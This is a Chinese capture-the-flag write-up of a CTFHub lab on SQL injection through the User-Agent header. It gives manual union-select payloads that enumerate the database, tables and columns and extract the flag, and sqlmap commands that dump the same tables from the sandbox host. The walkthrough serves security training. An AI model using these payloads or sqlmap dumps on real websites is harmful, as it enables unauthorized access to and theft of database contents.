首页 > 数据库 >CTFHUB-技能树-Web前置技能-SQL注入-Mysql结构-UA注入

CTFHUB-技能树-Web前置技能-SQL注入-Mysql结构-UA注入

时间:2024-04-08 21:31:05浏览次数:25  
标签:sqlmap Web 判断 -- sqli 技能 UA 注入

技能树-Web前置技能-SQL注入-Mysql结构-UA注入

文章目录

UA注入

UA注入,即User-Agent注入

手工注入

利用bp抓包,发送至repeater进行判断

看提示

在这里插入图片描述

注入点在User-Agent

虽然有提示,在此还是按常规进行一下注入点判断吧

判断注入点
抓包后,输入1 and 1=1 有回显

在这里插入图片描述

输入 1 and 1=2 无回显

在这里插入图片描述

由此判断,此处为注入点

判断字段数
1 order by 3 无回显

在这里插入图片描述

1 order by 2 有回显

在这里插入图片描述

由此判断,表中有两个字段

判断回显字段数
-1 union select 1,2 

在这里插入图片描述

1,2都回显,由此判断可回显字段数为2

爆库名
-1 union select user(),database()

在这里插入图片描述

得到数据库名为sqli

爆表名
-1 union select user(),group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述

得到两个表名,尝试查看第一个表中的数据

爆列名
-1 union select user(),group_concat(column_name) from information_schema.columns where table_name='pqqvoicejs'

在这里插入图片描述

得到列名xwprqxhxjd

爆数据

-1 union select user(),group_concat(xwprqxhxjd) from sqli.pqqvoicejs

在这里插入图片描述

得到flag

sqlmap

UA注入 需要用到leve 3

爆库
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/ -level 3 --dbs --batch

在这里插入图片描述

爆表
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli --tables --batch

在这里插入图片描述

爆列名
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli -T zcvvebogfz --columns  --batch

在这里插入图片描述

爆数据
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli -T zcvvebogfz -C glotmiduat --dump --batch

在这里插入图片描述

标签:sqlmap,Web,判断,--,sqli,技能,UA,注入
From: https://blog.csdn.net/Static______/article/details/137524337

相关文章

  • web 第一章对于html总结
    1.2.2渲染引擎(了解)渲染引擎(浏览器内核):浏览器中专门对代码进行解析渲染的部分浏览器出品的公司不同,内在的揎染引也是不同的:浏览器内核不一样,渲染方式就会不同怎么做到统一的打开页面解决就是要有一个相同的web标准1.3.2Web标准的构成Web标准中分成三个构成:构成语言说明......
  • 在Windows中用RailDrive挂载WebDAV网盘
    摘要RailDrive官网:https://www.raidrive.com/用RailDrive能把WebDAV网盘挂载成和本地硬盘一样。示例登入NextCloud后,在“文件”模块的左下角,有“文件设置”4个字:点击后,在对话框底部能得到我们需要的URL:在Windows11中安装完RailDrive后,屏幕托盘区有图标:在上图点“添加”......
  • 【javaWeb &第十二篇】MybatisPlus
    MybatisPlus详细学习快速入门MybatisPlus特性标准数据层开发分页查询按条件查询查询投影DQL编程控制DML编程控制逻辑删除乐观锁代码生成器快速入门MybatisPlus是基于Mybatis框架基础上开发的增强型工具,旨在简化开发,提高效率官方地址:http://mp.baomidou.com/开......
  • 说说对WebSocket的理解?应用场景?
    一、是什么WebSocket,是一种网络传输协议,位于OSI模型的应用层。可在单个TCP连接上进行全双工通信,能更好的节省服务器资源和带宽并达到实时通迅客户端和服务器只需要完成一次握手,两者之间就可以创建持久性的连接,并进行双向数据传输从上图可见,websocket服务器与客户端通过握手连......
  • stable-diffusion-webui怎么样增加自己训练的LoRA模型?
    不怕笑话,我曾经为了找这个功能,居然搞了半天时间,结果还没有搞定。后来再不断地研究各种教程,就是没有发现这个功能,无意间发现有一个人贴了一张图片,他只是介绍放到这个目录,他没有告诉我这个目录怎么样来的,因为我在同样的位置上没有这个目录。这样我训练出来的LoRA模型居然测试......
  • [网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
    文章目录一.工具&术语1.网安术语2.常用工具3.推荐文章二.常见攻击1.SQL注入2.XSS跨站3.越权漏洞4.CSRF跨站请求伪造5.支付漏洞三.音乐异或解密示例四.总结一.工具&术语1.网安术语常见安全网站及论坛:看雪(https://bbs.pediy.com/)安全客(https://www.anquanke.com)fre......
  • 06-SpringBootWeb快速入门
        ......
  • 苍穹外卖10(Spring Task定时任务,WebSocket双向通信,订单状态定时处理,来电提醒,客户催单)
    目录一、SpringTask1.介绍2.入门1使用步骤2使用示例3.详解1@Scheduled注解2cron表达式1cron表达式6个域2各个域的取值说明4.小结二、订单状态定时处理1.需求分析1问题分析2功能需求2.代码开发1修改引导类加@EnableScheduling2创建OrderTask......
  • web渗透-SSH私钥泄露
    发现主机netdiscover-r192.168.164.0扫描端口看到开放80和31337端口都为http服务 浏览器访问测试查看80端口和31337端口网页和源代码并无发现有用信息 目录扫描 扫描出80端口并无有用信息扫描31337端口发现敏感文件robots.txt和目录.ssh 访问敏感文件和目......
  • SpringBoot拦截器注入stringredistemplate出现Consider defining a bean of type 'org
    问题自定义拦截器需要注入StringRedisTemplate来通过token获取redis中的数据自定义拦截器代码@ComponentpublicclassLoginInterceptorimplementsHandlerInterceptor{@AutowiredprivateStringRedisTemplatestringRedisTemplate;@Overridepublicb......